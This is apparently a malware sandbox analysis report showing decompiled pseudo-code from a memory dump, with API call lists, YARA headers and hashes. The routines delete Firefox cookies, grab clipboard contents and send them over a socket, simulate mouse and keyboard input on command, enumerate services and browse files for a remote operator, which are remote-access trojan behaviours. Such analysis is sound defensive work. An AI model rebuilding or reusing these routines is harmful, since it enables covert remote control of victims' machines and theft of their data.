                                                                                                					__eflags = FindNextFileA(_t110,  &_v444);
                                                                                                					if(__eflags == 0) {
                                                                                                						L17:
                                                                                                						E00402076(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
                                                                                                						E0040A724(0, _t104, __eflags);
                                                                                                						FindClose(_t110);
                                                                                                						goto L18;
                                                                                                					} else {
                                                                                                						__eflags = 0;
                                                                                                						do {
                                                                                                							__eflags = _v444.dwFileAttributes & 0x00000010;
                                                                                                							if((_v444.dwFileAttributes & 0x00000010) == 0) {
                                                                                                								goto L16;
                                                                                                							} else {
                                                                                                								_t92 =  &(_v444.cFileName);
                                                                                                								__eflags =  *_t92 - 0x2e;
                                                                                                								if( *_t92 != 0x2e) {
                                                                                                									L8:
                                                                                                									_t105 =  &(_v444.cFileName);
                                                                                                									_t93 = 0;
                                                                                                									while(1) {
                                                                                                										_t56 =  *(_t105 + _t93) & 0x000000ff;
                                                                                                										_t106 = "..";
                                                                                                										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
                                                                                                										_t104 =  &(_v444.cFileName);
                                                                                                										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t93 = _t93 + 1;
                                                                                                										__eflags = _t93 - 3;
                                                                                                										if(_t93 != 3) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											_t57 = 0;
                                                                                                										}
                                                                                                										L13:
                                                                                                										__eflags = _t57;
                                                                                                										if(__eflags == 0) {
                                                                                                											goto L16;
                                                                                                										} else {
                                                                                                											_t104 = E004076DF( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
                                                                                                											E00401FC3( &_v52, _t59, _t110, E004076BB(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
                                                                                                											E00401FB9();
                                                                                                											E00401FB9();
                                                                                                											__eflags = DeleteFileA(E00401F87( &_v52));
                                                                                                											if(__eflags != 0) {
                                                                                                												_t102 = _t111 - 0x18;
                                                                                                												_push("\n[Firefox cookies found, cleared!]");
                                                                                                												goto L2;
                                                                                                											} else {
                                                                                                												_t68 = GetLastError();
                                                                                                												__eflags = _t68 != 0;
                                                                                                												if(_t68 != 0) {
                                                                                                													FindClose(_t110);
                                                                                                												} else {
                                                                                                													goto L16;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                										goto L19;
                                                                                                									}
                                                                                                									asm("sbb eax, eax");
                                                                                                									_t57 = _t56 | 0x00000001;
                                                                                                									__eflags = _t57;
                                                                                                									goto L13;
                                                                                                								} else {
                                                                                                									__eflags =  *(_t92 + 1) & 0x000000ff;
                                                                                                									if(( *(_t92 + 1) & 0x000000ff) == 0) {
                                                                                                										goto L16;
                                                                                                									} else {
                                                                                                										goto L8;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							goto L19;
                                                                                                							L16:
                                                                                                							__eflags = FindNextFileA(_t110,  &_v444);
                                                                                                						} while (__eflags != 0);
                                                                                                						goto L17;
                                                                                                					}
                                                                                                				} else {
                                                                                                					FindClose(_t110);
                                                                                                					_t102 = _t111 - 0x18;
                                                                                                					_push("\n[Firefox Cookies not found]");
                                                                                                					L2:
                                                                                                					E00402076(0, _t102);
                                                                                                					E0040A724(0, _t104, _t117);
                                                                                                					L18:
                                                                                                				}
                                                                                                				L19:
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return 1;
                                                                                                			}


























                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2DA
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A2F0
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040A31A
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A3C2
                                                                                                • GetLastError.KERNEL32 ref: 0040A3CC
                                                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3E0
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A406
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A427
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 532992503-432212279
                                                                                                • Opcode ID: 494c37ec604dfabe53921b45c37f0438a968762c2238668dac5d0b9ef9ce98f6
                                                                                                • Instruction ID: d893d8744396c2104635ba5db21cca7574aa892270d2e78e55a4dc7850fafc56
                                                                                                • Opcode Fuzzy Hash: 494c37ec604dfabe53921b45c37f0438a968762c2238668dac5d0b9ef9ce98f6
                                                                                                • Instruction Fuzzy Hash: 65418F309003295ACB14F7A5DC56DEEB768AF11308F50417FF502B61D2EF789E89CA9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E00413718(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                                                                                                				void* __ebx;
                                                                                                				int _t10;
                                                                                                				void* _t20;
                                                                                                				void* _t22;
                                                                                                				void* _t31;
                                                                                                				struct HWND__* _t38;
                                                                                                				void* _t57;
                                                                                                				void* _t61;
                                                                                                				void* _t64;
                                                                                                				void* _t66;
                                                                                                
                                                                                                				_t55 = __edx;
                                                                                                				_t10 = OpenClipboard(_t38);
                                                                                                				_t68 = _t10;
                                                                                                				if(_t10 != 0) {
                                                                                                					EmptyClipboard();
                                                                                                					E00401E3B( &_a16, _t55, _t68, _t38);
                                                                                                					_t57 = GlobalAlloc(0x2000, E0040247B() + 2);
                                                                                                					_t20 = GlobalLock(_t57);
                                                                                                					E00401E3B( &_a12, _t55, _t68, _t38);
                                                                                                					_t22 = E0040247B();
                                                                                                					E00433360(_t20, E00401F87(E00401E3B( &_a8, _t55, _t68, _t38)), _t22);
                                                                                                					_t66 = _t64 + 0xc;
                                                                                                					GlobalUnlock(_t57);
                                                                                                					SetClipboardData(0xd, _t57);
                                                                                                					CloseClipboard();
                                                                                                					if(OpenClipboard(_t38) != 0) {
                                                                                                						_t61 = GetClipboardData(0xd);
                                                                                                						_t31 = GlobalLock(_t61);
                                                                                                						GlobalUnlock(_t61);
                                                                                                						CloseClipboard();
                                                                                                						_t50 =  !=  ? _t31 : 0x46079c;
                                                                                                						E00404260(_t38,  &_a36,  !=  ? _t31 : 0x46079c);
                                                                                                						_t55 =  &_a32;
                                                                                                						E00417D8C(_t38, _t66 - 0x18,  &_a32);
                                                                                                						_push(0x6b);
                                                                                                						E00404BB7(_t38, 0x46e848,  &_a32, _t31);
                                                                                                						E00401EE2();
                                                                                                					}
                                                                                                				}
                                                                                                				E00401E66( &_a16, _t55);
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return 0;
                                                                                                			}














                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00413719
                                                                                                • EmptyClipboard.USER32 ref: 00413727
                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00413747
                                                                                                • GlobalLock.KERNEL32 ref: 00413750
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00413786
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0041378F
                                                                                                • CloseClipboard.USER32 ref: 004137AC
                                                                                                • OpenClipboard.USER32 ref: 004137B3
                                                                                                • GetClipboardData.USER32 ref: 004137C3
                                                                                                • GlobalLock.KERNEL32 ref: 004137CC
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004137D5
                                                                                                • CloseClipboard.USER32 ref: 004137DB
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                • String ID: HF
                                                                                                • API String ID: 3520204547-543897734
                                                                                                • Opcode ID: 4890fb612279e0ad9894535ee24836a5794b070536a2b296e3cf0257e589ee37
                                                                                                • Instruction ID: baa6a5d0df61b6bfd4a8d42e09ca4ec442865c3948b396e9068abef2692e7357
                                                                                                • Opcode Fuzzy Hash: 4890fb612279e0ad9894535ee24836a5794b070536a2b296e3cf0257e589ee37
                                                                                                • Instruction Fuzzy Hash: BB21397120420057D314BFB1DC5E9BE76A99FD470AF04053EF907961E2DF38C985865A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E00415968(signed int __edx, void* __eflags, char _a8) {
                                                                                                				void* _v28;
                                                                                                				char _v32;
                                                                                                				void* _v36;
                                                                                                				void* _v40;
                                                                                                				char _v44;
                                                                                                				char _v48;
                                                                                                				intOrPtr* _t60;
                                                                                                				intOrPtr* _t65;
                                                                                                				intOrPtr* _t67;
                                                                                                				intOrPtr* _t72;
                                                                                                				intOrPtr* _t74;
                                                                                                				char* _t79;
                                                                                                				char* _t80;
                                                                                                				char* _t81;
                                                                                                				intOrPtr* _t82;
                                                                                                				intOrPtr* _t85;
                                                                                                				intOrPtr _t90;
                                                                                                				signed int _t101;
                                                                                                				signed int _t109;
                                                                                                				signed int _t118;
                                                                                                				signed int _t136;
                                                                                                
                                                                                                				_t136 = __edx;
                                                                                                				_t90 =  *((intOrPtr*)(E004052CF(0)));
                                                                                                				E00404287( &_a8,  &_v32, 1, 0xffffffff);
                                                                                                				if(_t90 != 0x30) {
                                                                                                					__eflags = _t90 - 0x31;
                                                                                                					if(_t90 != 0x31) {
                                                                                                						__eflags = _t90 - 0x32;
                                                                                                						if(_t90 != 0x32) {
                                                                                                							__eflags = _t90 - 0x33;
                                                                                                							if(_t90 != 0x33) {
                                                                                                								__eflags = _t90 - 0x34;
                                                                                                								if(_t90 != 0x34) {
                                                                                                									__eflags = _t90 - 0x35;
                                                                                                									if(_t90 != 0x35) {
                                                                                                										__eflags = _t90 - 0x36;
                                                                                                										if(_t90 == 0x36) {
                                                                                                											_push(0);
                                                                                                											_push(0x78);
                                                                                                											goto L15;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_push(0);
                                                                                                										_push(0xffffff88);
                                                                                                										L15:
                                                                                                										mouse_event(0x800, 0, 0, ??, ??);
                                                                                                									}
                                                                                                								} else {
                                                                                                									_v40 =  *((intOrPtr*)(E004052CF(0)));
                                                                                                									_t60 = E004052CF(4);
                                                                                                									_t101 =  *0x46de68; // 0x0
                                                                                                									_v40 =  *_t60;
                                                                                                									E00415802( *((intOrPtr*)(0x46dd68 + _t101 * 4)),  &_v44, __eflags,  &_v40);
                                                                                                									E00415C34(_v44, _v40);
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t65 = E004052CF(0);
                                                                                                								_v44 =  *((intOrPtr*)(E004052CF(4)));
                                                                                                								_t67 = E004052CF(8);
                                                                                                								_t109 =  *0x46de68; // 0x0
                                                                                                								_v44 =  *_t67;
                                                                                                								E00415802( *((intOrPtr*)(0x46dd68 + _t109 * 4)),  &_v48, __eflags,  &_v44);
                                                                                                								E00415BD8( *_t65, _v48, _v44);
                                                                                                								goto L8;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t72 = E004052CF(0);
                                                                                                							_v40 =  *((intOrPtr*)(E004052CF(4)));
                                                                                                							_t74 = E004052CF(8);
                                                                                                							_t118 =  *0x46de68; // 0x0
                                                                                                							_v48 =  *_t74;
                                                                                                							E00415802( *((intOrPtr*)(0x46dd68 + _t118 * 4)),  &_v44, __eflags,  &_v48);
                                                                                                							E00415B7C( *_t72, _v44, _v48);
                                                                                                							goto L8;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t79 = E004052CF(4);
                                                                                                						_t80 = E004052CF(3);
                                                                                                						_t81 = E004052CF(2);
                                                                                                						_t82 = E004052CF(0);
                                                                                                						 *_t79 =  *_t80;
                                                                                                						__eflags =  *_t81;
                                                                                                						E00415C6C( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
                                                                                                						goto L8;
                                                                                                					}
                                                                                                				} else {
                                                                                                					E004052CF(0);
                                                                                                					_t85 = E004052CF(1);
                                                                                                					E00414F9A( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E004052CF(2)));
                                                                                                					L8:
                                                                                                				}
                                                                                                				E00401FB9();
                                                                                                				return E00401FB9();
                                                                                                			}

























                                                                                                APIs
                                                                                                • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 004159BC
                                                                                                • mouse_event.USER32 ref: 00415B5E
                                                                                                  • Part of subcall function 00415802: GetSystemMetrics.USER32 ref: 00415837
                                                                                                  • Part of subcall function 00415802: GetSystemMetrics.USER32 ref: 0041584C
                                                                                                  • Part of subcall function 00415C34: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 00415C60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$InputSendmouse_event
                                                                                                • String ID: 0$1$2$3$4$5$6
                                                                                                • API String ID: 1731092567-2737206560
                                                                                                • Opcode ID: 4e58b7ee089f2b41bba26569178f90f2d490adecfb0853686d80bfb814d9debd
                                                                                                • Instruction ID: 0830a3fa4487c9ddd4d3a0e861aa4b46f3ad6227d130d9b0a4fa38bfcfba80c1
                                                                                                • Opcode Fuzzy Hash: 4e58b7ee089f2b41bba26569178f90f2d490adecfb0853686d80bfb814d9debd
                                                                                                • Instruction Fuzzy Hash: 2251E174A187019FC700EF20D891ADB77A5EFD5714F00082FF592572E2DB78AA48CB5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00416A9F(intOrPtr __ecx) {
                                                                                                				int _v8;
                                                                                                				int _v12;
                                                                                                				int _v16;
                                                                                                				int _v20;
                                                                                                				struct _QUERY_SERVICE_CONFIG* _v24;
                                                                                                				void* _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				short** _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				char _v64;
                                                                                                				char _v88;
                                                                                                				char _v112;
                                                                                                				char _v136;
                                                                                                				struct _ENUM_SERVICE_STATUS _v172;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				struct _ENUM_SERVICE_STATUS* _t87;
                                                                                                				void* _t100;
                                                                                                				void* _t107;
                                                                                                				int _t108;
                                                                                                				long _t110;
                                                                                                				void* _t124;
                                                                                                				void* _t133;
                                                                                                				intOrPtr _t198;
                                                                                                				short** _t199;
                                                                                                				int _t201;
                                                                                                				intOrPtr _t202;
                                                                                                				int _t203;
                                                                                                				struct _QUERY_SERVICE_CONFIG* _t204;
                                                                                                
                                                                                                				_t198 = __ecx;
                                                                                                				_v40 = __ecx;
                                                                                                				_t133 = OpenSCManagerA(0, 0, 4);
                                                                                                				if(_t133 != 0) {
                                                                                                					E00401F5F(_t133,  &_v88);
                                                                                                					_v12 = 0;
                                                                                                					_v8 = 0;
                                                                                                					_v20 = 0;
                                                                                                					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
                                                                                                					if(__eflags != 0) {
                                                                                                						L12:
                                                                                                						CloseServiceHandle(_t133);
                                                                                                						E0040330C(_t133, _t198, __eflags,  &_v88);
                                                                                                						E00401EE2();
                                                                                                						L13:
                                                                                                						return _t198;
                                                                                                					}
                                                                                                					__eflags = GetLastError() - 0xea;
                                                                                                					if(__eflags != 0) {
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					_t201 = _v12;
                                                                                                					_push(_t201);
                                                                                                					_t87 = E0043776E( &_v88);
                                                                                                					_v36 = _t87;
                                                                                                					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
                                                                                                					_t202 = 0;
                                                                                                					_v32 = 0;
                                                                                                					__eflags = _v8;
                                                                                                					if(__eflags <= 0) {
                                                                                                						L11:
                                                                                                						L00437769(_v36);
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					_t199 = _v36;
                                                                                                					do {
                                                                                                						E00403303(E004043E6(_t133,  &_v112, _t199[1], __eflags, E00404260(_t133,  &_v64, 0x466afc)));
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						E00403303(E004043E6(_t133,  &_v64,  *_t199, __eflags, E00404260(_t133,  &_v112, 0x466afc)));
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						_t100 = E00404260(_t133,  &_v136, 0x466afc);
                                                                                                						E00403303(E00403022( &_v64, E00417C8F(_t133,  &_v112, _t199[3]), _t100));
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						_v16 = _v16 & 0x00000000;
                                                                                                						_t107 = OpenServiceW(_t133,  *_t199, 1);
                                                                                                						_v28 = _t107;
                                                                                                						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
                                                                                                						__eflags = _t108;
                                                                                                						if(_t108 == 0) {
                                                                                                							_t110 = GetLastError();
                                                                                                							__eflags = _t110 - 0x7a;
                                                                                                							if(_t110 == 0x7a) {
                                                                                                								_t203 = _v16;
                                                                                                								_push(_t203);
                                                                                                								_v24 = E0043776E( &_v16);
                                                                                                								_t204 = _v24;
                                                                                                								QueryServiceConfigW(_v28, _t204, _t203,  &_v16);
                                                                                                								E00403303(E00403098(_t133,  &_v136, E00417C8F(_t133,  &_v64,  *_t204), _t199, __eflags, 0x466afc));
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								_t52 = _t204 + 4; // 0x17e1e8d0
                                                                                                								E00403303(E00403098(_t133,  &_v136, E00417C8F(_t133,  &_v64,  *_t52), _t199, __eflags, 0x466afc));
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								_t124 = E00404260(_t133,  &_v112, 0x466afc);
                                                                                                								_t59 = _t204 + 0xc; // 0x8558d18
                                                                                                								E00403303(E00403098(_t133,  &_v136, E004043E6(_t133,  &_v64,  *_t59, __eflags, _t124), _t199, __eflags, "\n"));
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								L00437769(_t204);
                                                                                                								_t202 = _v32;
                                                                                                							}
                                                                                                						}
                                                                                                						CloseServiceHandle(_v28);
                                                                                                						_t202 = _t202 + 1;
                                                                                                						_t199 =  &(_t199[9]);
                                                                                                						_v32 = _t202;
                                                                                                						__eflags = _t202 - _v8;
                                                                                                					} while (__eflags < 0);
                                                                                                					_t198 = _v40;
                                                                                                					goto L11;
                                                                                                				}
                                                                                                				E00404260(_t133, _t198, 0x46079c);
                                                                                                				goto L13;
                                                                                                			}


                                                                                                APIs
                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,0046EAC8), ref: 00416AB6
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00416AFD
                                                                                                • GetLastError.KERNEL32 ref: 00416B0B
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00416B3C
                                                                                                • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,00466AFC,00000000,00466AFC,00000000,00466AFC), ref: 00416C0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                                                                                • String ID:
                                                                                                • API String ID: 2247270020-0
                                                                                                • Opcode ID: 652c6fad2e8d9efb67d0626e4b103414f7596d9ecb0e6dd7e91ce2b9e1164298
                                                                                                • Instruction ID: ab14fdf8f88a486ee839615bc9b265fb102329eecdc65eab08f32e9fae7241cf
                                                                                                • Opcode Fuzzy Hash: 652c6fad2e8d9efb67d0626e4b103414f7596d9ecb0e6dd7e91ce2b9e1164298
                                                                                                • Instruction Fuzzy Hash: 58812D71D00109ABCB14EBA1EC969EEB778EF54305F20806EF602761D1EF786A45CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E00415DC8(char* __edx, void* __eflags, char _a8) {
                                                                                                				struct _WIN32_FIND_DATAW _v1028;
                                                                                                				char _v1036;
                                                                                                				char _v1064;
                                                                                                				char _v1088;
                                                                                                				void* _v1092;
                                                                                                				char _v1100;
                                                                                                				char _v1116;
                                                                                                				void* _v1120;
                                                                                                				char _v1128;
                                                                                                				char _v1136;
                                                                                                				char _v1152;
                                                                                                				char _v1156;
                                                                                                				char _v1160;
                                                                                                				void* _v1164;
                                                                                                				char _v1172;
                                                                                                				char _v1176;
                                                                                                				void* _v1188;
                                                                                                				char _v1196;
                                                                                                				void* _v1200;
                                                                                                				void* _v1204;
                                                                                                				char _v1208;
                                                                                                				char _v1220;
                                                                                                				char _v1224;
                                                                                                				char _v1228;
                                                                                                				char _v1232;
                                                                                                				char _v1236;
                                                                                                				char _v1240;
                                                                                                				char _v1252;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr* _t63;
                                                                                                				int _t85;
                                                                                                				int _t91;
                                                                                                				void* _t102;
                                                                                                				void* _t108;
                                                                                                				void* _t109;
                                                                                                				char* _t113;
                                                                                                				void* _t115;
                                                                                                				void* _t116;
                                                                                                				void* _t130;
                                                                                                				void* _t133;
                                                                                                				void* _t228;
                                                                                                				void* _t229;
                                                                                                				signed int _t234;
                                                                                                				void* _t237;
                                                                                                				void* _t238;
                                                                                                				void* _t239;
                                                                                                				void* _t242;
                                                                                                
                                                                                                				_t242 = __eflags;
                                                                                                				_t213 = __edx;
                                                                                                				_push(_t139);
                                                                                                				_t63 = E00401F87( &_a8);
                                                                                                				E00404287( &_a8,  &_v1100, 4, 0xffffffff);
                                                                                                				_t237 = (_t234 & 0xfffffff8) - 0x4b4;
                                                                                                				E004020DE(_t139, _t237, __edx, _t242, 0x46e250);
                                                                                                				_t238 = _t237 - 0x18;
                                                                                                				E004020DE(_t139, _t238, __edx, _t242,  &_v1116);
                                                                                                				E00417E68( &_v1252, _t213);
                                                                                                				_t239 = _t238 + 0x30;
                                                                                                				_t228 =  *_t63 - 0x19;
                                                                                                				if(_t228 == 0) {
                                                                                                					E004020C7(_t139,  &_v1220);
                                                                                                					_t213 = 0x46e978;
                                                                                                					E00407677( &_v1172, 0x46e978, __eflags, L"\\*");
                                                                                                					_t229 = FindFirstFileW(E00401EDD( &_v1172),  &_v1028);
                                                                                                					__eflags = _t229 - 0xffffffff;
                                                                                                					if(__eflags == 0) {
                                                                                                						L14:
                                                                                                						E004020DE(_t139, _t239 - 0x18, _t213, __eflags,  &_v1220);
                                                                                                						_push(0x5d);
                                                                                                						E00404BB7(_t139, 0x46ea30, _t213, __eflags);
                                                                                                						E00401EE2();
                                                                                                						E00401FB9();
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					E00404260(_t139,  &_v1196,  &(_v1028.cFileName));
                                                                                                					_t213 = ".";
                                                                                                					_t85 = E00407647(__eflags);
                                                                                                					_t139 = _t85;
                                                                                                					E00401EE2();
                                                                                                					__eflags = _t85;
                                                                                                					if(__eflags != 0) {
                                                                                                						E00401FC3( &_v1228, ".", _t229, E0040209D(_t139,  &_v1196, ".", __eflags,  &_v1028, 0x250));
                                                                                                						E00401FB9();
                                                                                                					}
                                                                                                					while(1) {
                                                                                                						__eflags = FindNextFileW(_t229,  &_v1028);
                                                                                                						if(__eflags == 0) {
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						E00404260(_t139,  &_v1196,  &(_v1028.cFileName));
                                                                                                						_t213 = L"..";
                                                                                                						_t91 = E00407647(__eflags);
                                                                                                						_t139 = _t91;
                                                                                                						E00401EE2();
                                                                                                						__eflags = _t91;
                                                                                                						if(__eflags != 0) {
                                                                                                							E00403428(E0040209D(_t139,  &_v1196, L"..", __eflags,  &_v1028, 0x250));
                                                                                                							E00401FB9();
                                                                                                						}
                                                                                                					}
                                                                                                					goto L14;
                                                                                                				} else {
                                                                                                					_t244 = _t228 == 1;
                                                                                                					if(_t228 == 1) {
                                                                                                						_t102 = E00417CCA( &_v1152, E00401E3B( &_v1232, _t213, _t244, 1));
                                                                                                						E00403022( &_v1176, E00407677( &_v1128, 0x46e978, _t244, "\\"), _t102);
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						E004020C7(_t139,  &_v1224);
                                                                                                						_t108 = E00401EDD( &_v1176);
                                                                                                						_t213 =  &_v1224;
                                                                                                						_t109 = E004183CC(_t108,  &_v1224);
                                                                                                						_t245 = _t109;
                                                                                                						if(_t109 != 0) {
                                                                                                							_t113 = E00401F87(E00401E3B(0x46e3a4,  &_v1224, _t245, 0x1b));
                                                                                                							_t246 =  *_t113 - 1;
                                                                                                							if( *_t113 == 1) {
                                                                                                								_t130 = E0040247B();
                                                                                                								E00405C28( &_v1028, E00401F87(0x46e5f0), _t130);
                                                                                                								_t133 = E0040247B();
                                                                                                								E00401FC3( &_v1240, _t213, 0x46e5f0, E00405D50(_t139,  &_v1036, _t213,  &_v1156, E00401F87( &_v1228), _t133));
                                                                                                								E00401FB9();
                                                                                                							}
                                                                                                							_t115 = E00401E3B( &_v1232, _t213, _t246, 2);
                                                                                                							_t116 = E00401E3B( &_v1236, _t213, _t246, 0);
                                                                                                							_t213 = E00402F85(_t139,  &_v1160, E00402F85(_t139,  &_v1136, E00402F85(_t139,  &_v1088, E00402F85(_t139,  &_v1064, E00402FA9( &_v1208, E00401E3B( &_v1240, _t213, _t246, 1), 0x46e250), _t246, _t116), _t246, 0x46e250), _t246, _t115), _t246, 0x46e250);
                                                                                                							E00402F85(_t139, _t239 - 0x18, _t122, _t246,  &_v1220);
                                                                                                							_push(0x5e);
                                                                                                							E00404BB7(_t139, 0x46ea30, _t122, _t246);
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                						}
                                                                                                						E00401FB9();
                                                                                                						E00401EE2();
                                                                                                					}
                                                                                                					L15:
                                                                                                					E00401E66( &_v1252, _t213);
                                                                                                					E00401FB9();
                                                                                                					return E00401FB9();
                                                                                                				}
                                                                                                			}

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 0041601E
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 004160EA
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$CreateFirstNextchar_traits
                                                                                                • String ID: 0F$0F$PF$hpg$xF$xF
                                                                                                • API String ID: 3100282071-3544572515
